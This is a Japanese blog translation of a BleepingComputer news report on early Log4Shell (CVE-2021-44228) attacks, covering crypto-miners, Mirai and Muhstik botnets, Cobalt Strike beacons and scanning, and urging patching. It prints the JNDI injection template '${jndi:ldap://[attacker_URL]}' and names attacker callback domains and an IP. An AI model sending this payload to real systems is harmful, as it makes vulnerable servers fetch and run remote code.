Log4Shell 攻撃を予測:不正スキャン/クリプトマイナー/Mirai/Cobalt Strike

Hackers start pushing malware in worldwide Log4Shell attacks

2021/12/12 BleepingComputer — 脅威アクターたちは、Log4j Log4Shell CVE-2021-44228 の脆弱性をスキャン/悪用し、脆弱なサーバを見つけ出しマルウェアの展開などを行っている。この記事では、Log4j の脆弱性を悪用する既知のペイロード/スキャン/攻撃をまとめている。周知の通り、金曜日の早朝に、Web サーバーやアプリケーションのログ・アクセスに使用される、Java ベースのログ・プラットフォーム Apache Log4j に存在する、「Log4Shell」と呼ばれる深刻なゼロデイ脆弱性のエクスプロイトが公開された。

この脆弱性を悪用する脅威アクターは、Web ブラウザのユーザー・エージェントを変更した上でサイトに Web アクセスし、${jndi:ldap://[attacker_URL]} という形式の文字列を検索する。それにより、Web サーバーのアクセスログに、上記の文字列が付加される。Log4j アプリケーションがログを解析する際に、この文字列に遭遇すると、このバグは、JNDI (Java Naming and Directory Interface) 文字列に記載された URL への、コールバックまたはリクエストをサーバに行わせる。

脅威アクターは、その URL を利用して Base64 エンコードされたコマンドや Java クラスを渡し、脆弱なデバイス上で実行させることが可能となる。さらに、リモート・サーバーへの接続を強制するだけで、そのサーバーが Log4shell の脆弱性にさらされているのかどうかを判断できる。

この脆弱性を解決するために、Apache は Log4j 2.15.0を直ちにリリースしたが、すでに脅威アクターたちは、脆弱なサーバーをスキャン/て悪用し、データの流出/マルウェアのインストール/サーバーの乗っ取りなどに取り掛かり始めている。このソフトウェアは、何千もの企業において、アプリケーションや Web サイトで使用されているため、広範なサイバー攻撃やマルウェア展開につながることが、強く懸念されます。

以下に、現時点で確認されている、Log4j の脆弱性を悪用する攻撃の概要を示す。

マルウェアのインストールに使用される Log4Shell

リモートコードを容易に実行できる脆弱性が公開されると、マルウェアをビジネスにしようとする脅威アクターたちが、真っ先に悪用を開始するのが一般である。
以下では、BleepingComputer の Webサーバーのアクセスログや、GreyNoise データ、および研究者からの報告をもとに、Log4j を悪用する既知のマルウェアのペイロードをまとめている。

クリプトマイナー

この脆弱性が公開されると直ぐに、Log4Shell を悪用してシェルスクリプトを実行し、様々なクリプトマイナーをダウンロード/インストールする脅威アクターたちが登場した。Kinsing バックドアとクリプトマイニング・ボットネットの背後にいる脅威アクターは、脆弱なサーバーでシェルスクリプトをダウンロード/実行させるために、Base64 エンコードされたペイロードにより Log4j の脆弱性をワイルドに悪用している。このシェルスクリプトは、自身と競合するマルウェアを脆弱なデバイスから削除した後に、Kinsing マルウェアをダウンロード/インストールし、暗号通貨のマイニングを開始します。

Mirai および Muhstik ボットネット

Netlab 360 の報告によると、この脆弱性を悪用する脅威アクターたちは、Mirai および Muhstik マルウェアを脆弱なデバイスにインストールしている。これらのマルウェア・ファミリーは、IoT デバイスやサーバーをボットネットに取り込み、それらを用いた暗号解読機の展開や、大規模な DDoS 攻撃を実施する。Netlab 360 の研究者たちは、「今朝、我々は最初の答えを得た。我々の Anglerfish と Apacket のハニーポットは、ボットネットを形成するために Log4j の脆弱性をする、2つの攻撃の波を捉えた。簡単なサンプル分析では、Linux デバイスをターゲットにした Muhstik と Mirai のボットネットを形成するために利用されたことが分かった」と説明している。

Cobalt Strike Beacons

Microsoft Threat Intelligence Center は、Log4j の脆弱性が Cobalt Strike Beacons のドロップのためにも悪用されていると報告している。Cobalt Strike は合法的なペネトレーション・テストのツールキットであり、侵害されたデバイスでレッドチームがエージェント (Beacon) を配置し、リモート・ネットワークからの監視やコマンドの実行を行うためのものだ。しかし、Cobalt Strike のクラック版もあり、ネットワーク侵害やランサムウェア攻撃に使用されている。

スキャンと情報開示

Log4Shell エクスプロイトの悪用は、マルウェアのインストールだけには留まらない。脅威アクターやセキュリティ研究者は、このエクスプロイトを使って脆弱なサーバをスキャンし、そこから情報を流出させる。研究者はこのエクスプロイトを利用して、脆弱なサーバに URL へのアクセスや、コールバック・ドメインへの DNS リクエストを実行させている。それにより、研究者や脅威アクターは、対象となるサーバーが脆弱であるかどうかを判断し、今後の研究や攻撃、あるいは、バグバウンティ請求のために利用する。研究者の中には、このエクスプロイトを利用して、環境変数を無断で流出させるという、一歩踏み込んだ行為を行っている者もいるようだ。そこで流出する情報には、Log4j サービスが実行されているサーバーの、ホスト名/ユーザー名/OS 名/OS バージョンなどのデータが含まれる。

特に興味深いのは bingsearchlib.com ドメインであり、 Log4j エクスプロイトのコールバックとして多用されているものである。しかし、あるセキュリティ研究者が BleepingComputer に語ったところによると、このドメインがエクスプロイトのコールバックとして使用されている期間において、bingsearchlib.com の登録は確認されていなかったという。このセキュリティ研究者によると、脅威アクターによる悪用を防ぐためにドメインを登録したが、リクエストは記録されていないという。

脅威情報企業の GreyNoise によると、bingsearchlib.com のコールバックを使用している IP アドレスは、205.185.115.217:47324 という Log4Shell のコールバックも共通して使用している。BleepingComputer では、psc4fuel.com というドメインからの未知の攻撃が、当社の Web サイトを悪用するためのリクエストを繰り返していることを確認している。このドメインは、石油サービス会社に属する、正規の psc4fuel.com ドメインになりすましているようだ。psc4fuel.com ドメインは、エクスプロイトが実行する Java クラスをプッシュするために使用されている。しかし、BleepingComputer では、これらのクラスのサンプルを取得することができず、Log4j の脆弱性を悪用しているのが研究者なのか、あるいは、脅威アクターなのかを確認できなかった。

さいごに

ランサムウェア・ギャングなどの脅威アクターが、Log4j の脆弱性を悪用していることを示す調査結果は公表されていないが、Cobalt Strike Beacon が展開されているということは、こうした攻撃が差し迫っていることを意味する。そのため、すべてのユーザーは、最新バージョンの Log4j をインストールして、この脆弱性を可能な限り早く解消することが必要だ。Log4j の脆弱性を悪用する、その他のマルウェアをご存じの方は、本記事に情報を追加するので、Signal (646-961-3731) や、Twitter、問い合わせフォームで知らせてほしい。

Log4Shell に関する記事を訳していて、よく目にするのが “the triviality of exploitation” といった表現です。”triviality” は、つまらない/平凡/些末などの意味ですが、このブログでは「有りふれた」という訳にしようと思っています。この言葉とは裏腹に、それだけ悪用が容易で、攻撃される対象の的が絞りにくいという、ほんとうに困った状況に置かれているのだと感じます。米国の各メディアも、必死になって Log4Shell を追いかけています。ラフ訳が終わっている記事が、4〜5本あるので、今週は、それらを順次ポストしていく予定です。

%d bloggers like this: